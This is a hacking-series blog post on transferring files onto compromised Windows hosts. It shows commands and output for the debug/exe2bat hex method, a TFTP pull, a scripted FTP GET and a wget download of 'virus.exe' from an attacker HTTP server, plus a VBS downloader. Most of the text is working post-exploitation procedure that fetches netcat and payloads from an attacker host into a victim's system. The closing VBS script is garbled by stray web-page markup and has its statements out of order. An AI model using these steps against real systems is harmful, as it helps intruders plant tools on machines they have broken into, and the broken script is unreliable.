Uploading files to compromised systems

Written by  on October 21, 2015 

The windows debug method

Windows has a program called debug, this program can actually convert hex machine code to an executable or whatever. The windows debug method of transfering files to compromised boxes consist in converting a file to hex, then echo the file via the non interactive shell to the victim’s box and finally using debug to convert the hex to something usefull. Kali has a program called exe2bat in /usr/share/windows-binaries.

We can run that with:

root@kali:/usr/share/windows-binaries# wine exe2bat.exe nc.exe nc2.txt

Finished: nc.exe > nc2.txt
root@kali:/usr/share/windows-binaries#

That command will generate a txt file with some content like:

echo 6e 76 69 72 6f 6e 6d 65 6e 74 53 74 72 69 6e 67 73 57 00 00 a3 00 47 65 74 43 50 49 6e 66 6f 00 9d 00 47 65 74 41 43 50 00 00 09 01 47 65 74 4f 45 4d 43 50 00 00 1e 00 43 6f 6d 70 61 72 65 53 74 72 69 6e 6$
echo e e780 >>123.hex
echo 6c 65 00 00 19 02 53 65 74 46 69 6c 65 50 6f 69 6e 74 65 72 00 00 2b 01 47 65 74 53 74 72 69 6e 67 54 79 70 65 41 00 00 2e 01 47 65 74 53 74 72 69 6e 67 54 79 70 65 57 00 00 16 01 47 65 74 50 72 6f 63 41 6$
echo e e800 >>123.hex
echo 47 65 74 4e 75 6d 62 65 72 4f 66 43 6f 6e 73 6f 6c 65 49 6e 70 75 74 45 76 65 6e 74 73 00 31 00 43 72 65 61 74 65 46 69 6c 65 41 00 10 02 53 65 74 45 6e 64 4f 66 46 69 6c 65 00 00 8d 01 4c 43 4d 61 70 53 7$
echo e e880 >>123.hex
echo 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0$
echo e e900 >>123.hex
echo  >>123.hex
echo r cx >>123.hex
echo e800 >>123.hex
echo w >>123.hex
echo q >>123.hex
debug<123.hex
copy 1.dll nc.exe

After doing this, all we should do is to copy all the content of the text file and past that inside the shell window.

0C96:E8E0  00.00   00.00   00.00   00.00   00.00   00.00   00.00   00.00
0C96:E8E8  00.00   00.00   00.00   00.00   00.00   00.00   00.00   00.00
0C96:E8F0  00.00   00.00   00.00   00.00   00.00   00.00   00.00   00.00
0C96:E8F8  00.00   00.00   00.00   00.00   00.00   00.00   00.00   00.00
0C96:E900  EC.     0E.     AC.
-e e900
0C96:E900  EC.
EC   0E.e    AC.ac
-r cx
CX 0000
:e800
-w
Writing 0E800 bytes
-q

C:\TRANSF~1>

And our file will appear inside the remote dir:

21/10/2015  22:44    <DIR>          .
21/10/2015  22:44    <DIR>          ..
21/10/2015  22:44            59.392 1.DLL
21/10/2015  22:44           184.270 123.hex
21/10/2015  22:44            59.392 nc.exe

The TFTP method

Tftp is a protocol that works with UDP packets to send and retrieve information between machines on the network. It can be used to transfer files between a compromised system and the attacker box. Take note that tftp works with udp traffic, so if you are sending some large amount of information you may lost some of it due to the lack of integrity checks.

You can install a simple python tftp server with:

# apt-get install git && git clone git://github.com/msoulier/tftpy.git

Then create a folder that will host your files and chmod it to 777. After that install the server and run it

# cd tftpy

# python setup.py install

After installing the server you can run it via

# cd bin

# python tftpy_server.py -r /yourfolder

And on the victim box you can run the following to get the desired file

C:\TRANSF~1>tftp -i 192.168.11.70 get nc.exe
tftp -i 192.168.11.70 get nc.exe

C:\TRANSF~1>

The FTP method

Another method useful for sending files to a remote compromised host is using a ftp server. As ftp works with TCP integrity check of packets is performed so we can use this to transfer larger files. We can use some ftp server like vsftpd on linux systems

# apt-get install vsftpd

After installing vsftpd, we can edit /etc/vsftpd.conf and uncomment local_enable and write_enable, then restart the service and start sendinf files.

For sending files to the remote box using a non interactive shell we can just write the following inside the shell’s window, we’ll asume that ftp is the user and ftp is the password.

C:\WINDOWS\system32>echo open 192.168.11.70 21> ftp.txt
C:\WINDOWS\system32>echo ftp>> ftp.txt
C:\WINDOWS\system32>echo bin >> ftp.txt
C:\WINDOWS\system32>echo ftp>> ftp.txt
C:\WINDOWS\system32>echo GET nc.exe >> ftp.txt
C:\WINDOWS\system32>echo bye >> ftp.txt
C:\WINDOWS\system32>ftp -s:ftp.txt

Then the file will appear inside our shell’s actual dir.

The HTTP method

As I use to do when working inside unix-like compromised hosts, setting up an http server somewhere in the net and using the wget command can be a simple way to transfer files to the remote host. Windows don’t have a native tool like wget, but in /usr/share/windows-binaries folder in kali linux we can find wget.exe, a tool that will do the same on windows. We can transfer wget.exe to the remote host via the debut method and then use it along with an http server.

Fot the http server we can use Apache2

# apt-get install apache2

Then move our files to /var/www/

And run wget on the windows box like

C:\TRANSF~1>wget.exe http://192.168.11.16/virus.exe
wget.exe http://192.168.11.16/virus.exe
–23:34:27–  http://192.168.11.16/virus.exe
=> `virus.exe’
Connecting to 192.168.11.16:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 73,802 [application/x-msdos-program]

0K ………. ………. ………. ………. ………. 69%    4.88 MB/s
50K ………. ………. ..                              100%   21.55 MB/s

23:34:27 (7.04 MB/s) – `virus.exe’ saved [73802/73802]

C:\TRANSF~1>

Another way to run a wget like command don windows is to use the following script that can be simply echoead to a file using the non interactive shell window:

‘Barabas pure vbs downloader – tested on XP sp2
‘Microsoft
fixed
adodbstream
but
guess
what
<img
includes/images/smilies/icon_smile.gif” alt=”:)” class=”wp-smiley”>
‘(c)dec 2004
‘First argument = complete url to download
‘Second Argument = filename you want to save
‘thnks to http://www.ericphelps.com/scripting/samples/BinaryDownload/

‘v2 – now includes proxy support for the winhttp request stuff
strUrl = WScript.Arguments.Item(0)
StrFile = WScript.Arguments.Item(1)
‘WinHttpRequest proxy settings.
Const HTTPREQUEST_PROXYSETTING_
DEFAULT = 0
Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0
Const HTTPREQUEST_PROXYSETTING_DIRECT = 1
Const HTTPREQUEST_PROXYSETTING_PROXY = 2
219
src=”http://s.wordpress.com/wp-Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts
Err.Clear
Set http = Nothing
Set http = CreateObject(“WinHttp.WinHttpRequest.5.1”)
If http Is Nothing Then Set http =
CreateObject(“WinHttp.WinHttpRequest”)
If http Is Nothing Then Set http =
CreateObject(“MSXML2.ServerXMLHTTP”)
If http Is Nothing Then Set http = CreateObject(“Microsoft.XMLHTTP”)
‘ comment out next line if no proxy is being used
‘ and change the proxy to suit ur needs -duh
http.SetProxy HTTPREQUEST_PROXYSETTING_PROXY, “web-proxy:80”
http.Open “GET”, strURL, False
http.Send
varByteArray = http.ResponseBody
Set http = Nothing
strBuffer = “”
strData = “”
Set ts = fs.CreateTextFile(StrFile, True)
Set fs = CreateObject(“Scripting.FileSystemObject”)
For lngCounter = 0 to UBound(varByteArray)
ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1)))
Next
ts.Close

Category : hacking series

Leave a Reply

Your email address will not be published. Required fields are marked *